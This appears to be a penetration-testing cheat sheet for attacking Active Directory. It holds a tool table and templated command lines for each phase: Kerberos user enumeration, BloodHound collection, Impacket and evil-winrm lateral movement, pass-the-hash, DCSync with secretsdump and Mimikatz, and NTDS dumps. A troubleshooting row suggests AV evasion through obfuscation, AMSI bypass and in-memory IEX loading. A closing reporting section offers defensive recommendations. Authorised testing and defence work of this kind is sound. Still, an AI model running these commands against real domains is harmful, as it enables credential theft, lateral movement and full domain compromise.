π‘οΈ Methodology Checklist
- Unauthenticated phase: Kerbrute, rpcclient NULL, enum4linux-ng
- First credential: BloodHound.py, PowerView, Snaffler, GetUserSPNs
- Lateral movement: Impacket psexec/wmiexec/smbexec, evil-winrm, NXC
- Domain compromise: secretsdump DCSync, Mimikatz DCSync, NTDS dump
- Kerberos attacks: Rubeus (Windows), impacket-GetUserSPNs/GetNPUsers (Linux)
- ACL abuse: PowerView + BloodHound ACL edges
- Select tool based on OS context and EDR presence
π― Operational Context
Use when: Selecting the right AD enumeration tool for current access level and constraints β quick lookup for PowerView vs ldapsearch vs BloodHound vs native. Think Dumber First: Use BloodHound first if you have any creds. PowerView for targeted property queries. Native commands when tools are blocked. Match tool to access level β donβt use credentialed tools before you have creds. Skip when: N/A β this is a reference document.
β‘ Tactical Cheatsheet
| Tool | Primary Use |
|---|---|
PowerView.ps1 / SharpView | AD situational awareness, targeted object queries, Kerberoastable/ASREPRoastable user finding |
BloodHound | Visual AD relationship mapping, shortest attack path discovery |
SharpHound.exe | C# BloodHound data collector β generates JSON for BH import |
BloodHound.py | Python BH ingestor β runs from non-domain-joined attack box |
Kerbrute | Kerberos pre-auth user enumeration, password spraying, brute force |
Impacket | Python toolkit β covers nearly all AD attack surfaces |
Responder | LLMNR/NBT-NS/MDNS poisoner β captures NTLMv2 hashes |
Inveigh.ps1 / InveighZero | Windows-based LLMNR poisoner (PowerShell/C#) |
Rubeus | Kerberos abuse tool β Kerberoasting, AS-REP, Pass-the-Ticket, S4U |
Mimikatz | LSASS dump, PtH, plaintext extraction, Kerberos ticket extraction |
CrackMapExec / NetExec (nxc) | SMB/WMI/WinRM enumeration, spray, dump, lateral movement |
evil-winrm | Interactive WinRM shell |
rpcclient | RPC-based AD enumeration from Linux |
enum4linux / enum4linux-ng | SMB/Samba AD enumeration |
ldapsearch / windapsearch | LDAP queries for AD objects |
Snaffler | File share credential/secret hunting across AD |
secretsdump.py | Remote SAM/LSA/NTDS dump |
psexec.py | Semi-interactive shell via SMB |
wmiexec.py | Command execution via WMI |
smbclient.py / smbmap | Share enumeration, file access |
GetUserSPNs.py | Kerberoasting (list SPN accounts + request TGS) |
GetNPUsers.py | ASREPRoasting (list + dump AS-REP hashes) |
ntlmrelayx.py | NTLM relay attacks |
PetitPotam.py | NTLM coercion via MS-EFSRPC |
noPac.py | CVE-2021-42278/42287 machine account β DA impersonation |
mssqlclient.py | MSSQL interaction (xp_cmdshell, xp_dirtree) |
lookupsid.py | SID brute-force for RID enumeration |
ticketer.py | TGT/TGS ticket creation and customization |
gettgtpkinit.py | Certificate β TGT (ADCS attacks) |
getnthash.py | TGT β NT hash via U2U (Shadow Credentials) |
DomainPasswordSpray.ps1 | PowerShell domain password spraying |
LAPSToolkit | LAPS auditing and password retrieval |
gpp-decrypt | Decrypt Group Policy Preferences cpassword |
adidnsdump | AD-integrated DNS zone dump |
PingCastle | AD security risk assessment (CMMI-based) |
Group3r | GPO misconfiguration auditing |
ADRecon | AD data extraction to Excel format |
setspn.exe | Read/modify/delete SPNs on AD service accounts |
raiseChild.py | Child-to-parent domain privilege escalation |
rpcdump.py | RPC endpoint mapper |
smbserver.py | Instant SMB server for file transfer |
AD Explorer | GUI AD viewer/editor + offline snapshot comparison |
π¬ Deep Dive & Workflow
Tool Selection by Phase
Unauthenticated / NULL Session Phase:
kerbrute userenum --dc [DC_IP] -d [DOMAIN] userlist.txt # user enum via Kerberos
nxc smb [DC_IP] -u '' -p '' --users # NULL session user list
rpcclient -U "" -N [DC_IP] # NULL session RPC
enum4linux-ng [DC_IP] # full SMB/RPC enumFirst Credential β Enumeration Phase:
# BloodHound data collection
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All
# Or via SharpHound (from Windows):
.\SharpHound.exe -c All --zipfilename loot.zip
# PowerView targeted queries:
Get-DomainUser -SPN # Kerberoastable
Get-DomainUser -PreauthNotRequired # ASREPRoastable
Get-DomainGroup -AdminCount
Get-DomainComputer -Unconstrained # Unconstrained delegation
# Snaffler for share cred hunting:
.\Snaffler.exe -s -o snaffler_output.txtLateral Movement Phase:
# Impacket lateral movement options:
impacket-psexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
impacket-wmiexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
impacket-smbexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS]
# Pass-the-Hash:
impacket-psexec [DOMAIN]/[USER]@[TARGET_IP] -hashes :[NTLM_HASH]
nxc smb [TARGET_IP] -u [USER] -H [NTLM_HASH]Domain Compromise Phase:
# DCSync (from Linux):
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm
# Mimikatz DCSync (from Windows):
lsadump::dcsync /user:[DOMAIN]\[USER]
lsadump::dcsync /all /csv
# NTDS.dit dump:
nxc smb [DC_IP] -u [USER] -p [PASS] --ntdsImpacket Quick Reference
# Most used impacket scripts:
impacket-secretsdump # dump SAM/LSA/NTDS
impacket-psexec # SMB SYSTEM shell
impacket-wmiexec # WMI exec (SYSTEM)
impacket-smbexec # Service exec
impacket-mssqlclient # MSSQL interactive
impacket-ntlmrelayx # NTLM relay
impacket-GetUserSPNs # Kerberoast
impacket-GetNPUsers # ASREPRoast
impacket-lookupsid # RID brute
impacket-ticketer # Ticket forge
impacket-smbserver # Quick SMB share
impacket-rpcdump # RPC endpoint mapBloodHound Key Queries
"Shortest Paths to Domain Admins"
"Shortest Paths to Domain Admins from Owned Principals"
"Find Computers with Unconstrained Delegation"
"Find AS-REP Roastable Users"
"Shortest Paths from Kerberoastable Users"
"Users with DCSync Rights"
"Transitive Object Control" (for ACL abuse chains)
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which tool to use | Access level unclear | Determine: unauthenticated β enum4linux; creds Linux β ldapdomaindump/bloodhound-python; creds Windows β SharpHound/PowerView |
| Tool blocked by AV | Default signatures | Rename binary, obfuscate, or use AMSI bypass; PowerView can be loaded via IEX from memory |
| BloodHound data stale | Collected too early | Re-run SharpHound after privilege escalation to capture new ACL edges visible with higher privileges |
| ldapsearch returns too much data | No filter applied | Filter: ldapsearch -x ... '(objectClass=user)' sAMAccountName β limit attributes returned |
| Tool version mismatch | SharpHound vs BloodHound CE incompatibility | Match versions: BloodHound CE requires SharpHound 2.x; Legacy BloodHound uses SharpHound 1.x |
π Reporting Trigger
Finding Title: AD Enumeration Toolset Provides Comprehensive Domain Visibility Impact: The combination of BloodHound, PowerView, ldapdomaindump, and native LDAP queries provides complete AD attack surface mapping including shortest paths to Domain Admin, Kerberoastable accounts, and ACL abuse opportunities. Root Cause: Legitimate AD enumeration tools are dual-use and indistinguishable from normal IT administration at the protocol level. Recommendation: Implement Microsoft Defender for Identity to detect tool-specific query patterns. Alert on SharpHound LDAP collection signatures. Enforce least-privilege AD read permissions to limit data returned to standard users.